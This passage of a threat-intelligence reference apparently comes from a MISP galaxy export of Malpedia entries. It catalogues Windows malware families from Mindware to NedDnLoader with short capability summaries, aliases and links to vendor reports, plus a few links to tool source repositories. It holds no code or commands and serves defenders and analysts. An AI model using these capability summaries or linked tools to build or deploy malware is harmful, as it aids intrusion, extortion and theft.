https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://securelist.com/the-sessionmanager-iis-backdoor/106868/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns

https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger

https://github.com/gentilkiwi/mimikatz

https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains

https://twitter.com/inversecos/status/1456486725664993287

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.infinitumit.com.tr/apt-35/

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://asec.ahnlab.com/en/47455/

https://www.mandiant.com/resources/blog/alphv-ransomware-backup

https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html

https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf

Mindware

Ransomware, potential rebranding of win.sfile.

The tag is: misp-galaxy:malpedia="Mindware"

Mindware is also known as:

Table 4021. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware

https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/

miniBlindingCan

miniBlindingCan is an HTTP(S) orchestrator.

It is a variant of the BlindingCan RAT, having the same command parsing logic, but supporting only a small subset of commands available previously. The main operations are the update of the malware configuration, and the download and execution of additional payloads from the attackers' C&C.

The miniBlindingCan malware was used in Operation DreamJob attacks against aerospace and media companies in Q2-Q3 2022.

The tag is: misp-galaxy:malpedia="miniBlindingCan"

miniBlindingCan is also known as:

  • AIRDRY.V2

  • EventHorizon

Table 4024. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

MiniStealer

The tag is: misp-galaxy:malpedia="MiniStealer"

MiniStealer is also known as:

Table 4026. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ministealer

https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/

miniTypeFrame

miniTYPEFRAME is a variant of TYPEFRAME, a RAT for Windows.

Its functionality is reduced to serving mostly as a proxy module. Its commands are indexed by 16-bit integers, usually in the range 0x8027–0x8044.

The tag is: misp-galaxy:malpedia="miniTypeFrame"

miniTypeFrame is also known as:

Table 4027. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe

https://www.cisa.gov/news-events/analysis-reports/ar18-165a

MintStealer

The tag is: misp-galaxy:malpedia="MintStealer"

MintStealer is also known as:

Table 4028. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mintstealer

https://twitter.com/ViriBack/status/1610393842787704835

MirageFox

The tag is: misp-galaxy:malpedia="MirageFox"

MirageFox is also known as:

Table 4030. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox

https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

MirrorBlast

According to Minerva Labs, MirrorBlast is a trojan known for attacking users' browsers. It usually pretends to be a legitimate browser add-on but has since evolved additional capabilities, installing other malware alongside itself. The trojan is thought to have tentative links to the TA505 and PYSA groups.

The tag is: misp-galaxy:malpedia="MirrorBlast"

MirrorBlast is also known as:

Table 4032. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast

https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924

https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant

https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/

https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/

https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies

MirrorKey

According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.

The tag is: misp-galaxy:malpedia="MirrorKey"

MirrorKey is also known as:

Table 4033. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

Misdat

The tag is: misp-galaxy:malpedia="Misdat"

Misdat is also known as:

Table 4034. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat

https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Misfox

The tag is: misp-galaxy:malpedia="Misfox"

Misfox is also known as:

  • MixFox

  • ModPack

Table 4035. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox

Misha

Undocumented information stealer targeting multiple browsers and cryptocurrencies. The internal project name appears to be "misha".

The tag is: misp-galaxy:malpedia="Misha"

Misha is also known as:

Table 4036. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.misha

https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html

https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/

Mispadu

According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

The tag is: misp-galaxy:malpedia="Mispadu"

Mispadu is also known as:

  • URSA

Table 4037. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu

https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/.YyXEkaRBzIU

https://blog.scilabs.mx/cyber-threat-profile-malteiro/

https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/

https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces

https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/

MISTCLOAK

Mandiant associates this with UNC4191; this malware decrypts and runs DARKDEW.

The tag is: misp-galaxy:malpedia="MISTCLOAK"

MISTCLOAK is also known as:

  • HIUPAN

Table 4038. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/

Miuref

The tag is: misp-galaxy:malpedia="Miuref"

Miuref is also known as:

Table 4040. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref

MMON

The tag is: misp-galaxy:malpedia="MMON"

MMON is also known as:

  • Kaptoxa

Table 4041. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon

http://reversing.fun/posts/2022/01/02/mmon.html

MM Core

The tag is: misp-galaxy:malpedia="MM Core"

MM Core is also known as:

Table 4042. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core

MobiRAT

The tag is: misp-galaxy:malpedia="MobiRAT"

MobiRAT is also known as:

Table 4043. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat

https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/

Mocky LNK

LNK files used to lure and orchestrate execution of various scripts, interacting with the Mocky API service.

The tag is: misp-galaxy:malpedia="Mocky LNK"

Mocky LNK is also known as:

Table 4044. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mocky_lnk

https://cert.gov.ua/article/4492467

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf

https://www.zscaler.com/blogs/security-research/steal-it-campaign

Mocton

The tag is: misp-galaxy:malpedia="Mocton"

Mocton is also known as:

Table 4045. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton

ModernLoader

According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.

Loader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.

The tag is: misp-galaxy:malpedia="ModernLoader"

ModernLoader is also known as:

  • AvatarBot

Table 4046. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.modern_loader

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

ModPipe

ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses a modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe’s operators access to database contents, including various definitions and configuration, status tables and information about POS transactions.

The tag is: misp-galaxy:malpedia="ModPipe"

ModPipe is also known as:

Table 4048. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.modpipe

https://www.foregenix.com/blog/modpipe-malware-has-a-new-module-that-siphons-payment-card-data

https://www.welivesecurity.com/2020/11/12/hungry-data-modpipe-backdoor-hits-pos-software-hospitality-sector/

https://www.kroll.com/en/insights/publications/cyber/modpipe-pos-malware-new-hooking-targets-extract-card-data

Mofksys

The tag is: misp-galaxy:malpedia="Mofksys"

Mofksys is also known as:

Table 4050. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_MOFKSYS.A/

Moisha Ransomware

The tag is: misp-galaxy:malpedia="Moisha Ransomware"

Moisha Ransomware is also known as:

Table 4051. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moisha

https://id-ransomware.blogspot.com/2022/08/moisha-ransomware.html

MoleNet

MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020; however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.

The tag is: misp-galaxy:malpedia="MoleNet"

MoleNet is also known as:

Table 4055. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.molenet

https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign

MontysThree

The tag is: misp-galaxy:malpedia="MontysThree"

MontysThree is also known as:

  • MT3

Table 4060. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.montysthree

https://securelist.com/montysthree-industrial-espionage/98972/

MoonBounce

MoonBounce is a malware embedded into a modified UEFI firmware. Placed into SPI flash, it can provide persistence across full reinstall and even disk replacements. MoonBounce deploys user-mode malware through in-memory staging with a small footprint.

The tag is: misp-galaxy:malpedia="MoonBounce"

MoonBounce is also known as:

Table 4061. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce

https://www.binarly.io/posts/A_deeper_UEFI_dive_into_MoonBounce/index.html

https://habr.com/ru/amp/post/668154/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/01/19115831/MoonBounce_technical-details_eng.pdf

https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/

Moriya

This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.

The tag is: misp-galaxy:malpedia="Moriya"

Moriya is also known as:

Table 4064. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/

Morphine

The tag is: misp-galaxy:malpedia="Morphine"

Morphine is also known as:

Table 4065. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine

MortalKombat

The tag is: misp-galaxy:malpedia="MortalKombat"

MortalKombat is also known as:

Table 4066. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mortalkombat

https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/

MosaicRegressor

The tag is: misp-galaxy:malpedia="MosaicRegressor"

MosaicRegressor is also known as:

Table 4068. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mosaic_regressor

https://securelist.com/mosaicregressor/98849/

Moserpass

The tag is: misp-galaxy:malpedia="Moserpass"

Moserpass is also known as:

Table 4069. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moserpass

https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/

Mount Locker

According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020. The MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software. Victims’ files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048. The ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.

The tag is: misp-galaxy:malpedia="Mount Locker"

Mount Locker is also known as:

  • DagonLocker

  • MountLocker

  • QuantumLocker

Table 4071. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker

https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html

https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/

https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines

https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/

https://community.riskiq.com/article/47766fbd

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry

https://securityscorecard.pathfactory.com/research/quantum-ransomware

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/

https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/

https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

Moure

The tag is: misp-galaxy:malpedia="Moure"

Moure is also known as:

Table 4072. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.moure

mozart

According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals to avoid detection via security software. Mozart is categorized as a malware loader and executes commands that cause download and installation of malicious software.

The tag is: misp-galaxy:malpedia="mozart"

mozart is also known as:

Table 4073. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart

https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md

https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html

MRAC

Ransomware.

The tag is: misp-galaxy:malpedia="MRAC"

MRAC is also known as:

Table 4076. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac

https://id-ransomware.blogspot.com/2021/12/mrac-ransomware.html

MrDec

Ransomware.

The tag is: misp-galaxy:malpedia="MrDec"

MrDec is also known as:

Table 4077. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec

https://dissectingmalwa.re/i-literally-cant-think-of-a-fitting-pun-mrdec-ransomware.html

MrPeter

The tag is: misp-galaxy:malpedia="MrPeter"

MrPeter is also known as:

Table 4078. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mr_peter

https://github.com/mrfr05t/Mr.Peter

murkytop

A command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.

The tag is: misp-galaxy:malpedia="murkytop"

murkytop is also known as:

Table 4082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Mutabaha

The tag is: misp-galaxy:malpedia="Mutabaha"

Mutabaha is also known as:

Table 4084. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha

http://vms.drweb.ru/virus/?_is=1&i=8477920

MyloBot

According to PCrisk, MyloBot is a high-risk trojan-type virus that allows cyber criminals to control the infected machine. MyloBot can be considered as a botnet, since all infected computers are connected to a single network. Depending on cyber criminals' goals, infected machines might be misused or have additional infections applied.

The tag is: misp-galaxy:malpedia="MyloBot"

MyloBot is also known as:

  • FakeDGA

  • WillExec

Table 4088. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot

https://github.com/360netlab/DGA/issues/36

https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet

http://www.freebuf.com/column/153424.html

http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html

https://ti.qianxin.com/blog/articles/Analysis-of-Recent-Activities-of-the-Mylobot-Botnet-EN/

https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/

https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html

https://blog.centurylink.com/mylobot-continues-global-infections/

Mystic Stealer

According to ZScaler, Mystic Stealer is a new information stealer that was first advertised in April 2023, capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, also targeting cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated, making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants. Mystic implements a custom binary protocol that is encrypted with RC4.

The tag is: misp-galaxy:malpedia="Mystic Stealer"

Mystic Stealer is also known as:

Table 4090. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer

https://www.zscaler.com/blogs/security-research/mystic-stealer

MZRevenge

The tag is: misp-galaxy:malpedia="MZRevenge"

MZRevenge is also known as:

  • MaMo434376

Table 4091. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.mzrevenge

https://dissectingmalwa.re/a-projectexe-that-should-have-stayed-in-a-drawer-mzrevenge-mamo434376.html

N40

Botnet with a focus on banks in Latin America and South America. Relies on DLL sideloading attacks to execute malicious DLL files. Uses a legitimate VMware executable in attacks. As of March 2019, the malware is under active development, with updated versions coming out on a persistent basis.

The tag is: misp-galaxy:malpedia="N40"

N40 is also known as:

Table 4092. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.n40

https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/

http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html

http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware

https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector

Nabucur

The tag is: misp-galaxy:malpedia="Nabucur"

Nabucur is also known as:

Table 4093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur

Nagini

The tag is: misp-galaxy:malpedia="Nagini"

Nagini is also known as:

Table 4095. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini

http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/

Nanocore RAT

Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It has been used for a while by numerous criminal actors as well as by nation state threat actors.

The tag is: misp-galaxy:malpedia="Nanocore RAT"

Nanocore RAT is also known as:

  • Nancrat

  • NanoCore

Table 4097. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore

https://www.secureworks.com/research/darktortilla-malware-analysis

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage

https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html

https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore

https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/

https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://assets.virustotal.com/reports/2021trends.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/

https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread

https://community.riskiq.com/article/24759ad2

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://blog.morphisec.com/syk-crypter-discord

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/

https://goggleheadedhacker.com/blog/post/11

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire

https://www.ic3.gov/media/news/2020/200917-1.pdf

https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html

https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://community.riskiq.com/article/ade260c6

https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

https://malwareindepth.com/defeating-nanocore-and-cypherit/

https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918

https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages

https://intel471.com/blog/privateloader-malware

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332

NanoLocker

The tag is: misp-galaxy:malpedia="NanoLocker"

NanoLocker is also known as:

Table 4098. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker

Necurs

The tag is: misp-galaxy:malpedia="Necurs"

Necurs is also known as:

  • nucurs

Table 4105. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs

https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf

https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/

https://www.secureworks.com/research/threat-profiles/gold-riverview

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/

https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf

https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/

http://www.secureworks.com/research/threat-profiles/gold-riverview

https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors

https://www.bitsight.com/blog/joint-effort-with-microsoft-to-takedown-massive-criminal-botnet-necurs

http://blog.talosintelligence.com/2017/03/necurs-diversifies.html

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/

https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features

https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/

https://bin.re/blog/the-dgas-of-necurs/

https://intel471.com/blog/a-brief-history-of-ta505

NedDnLoader

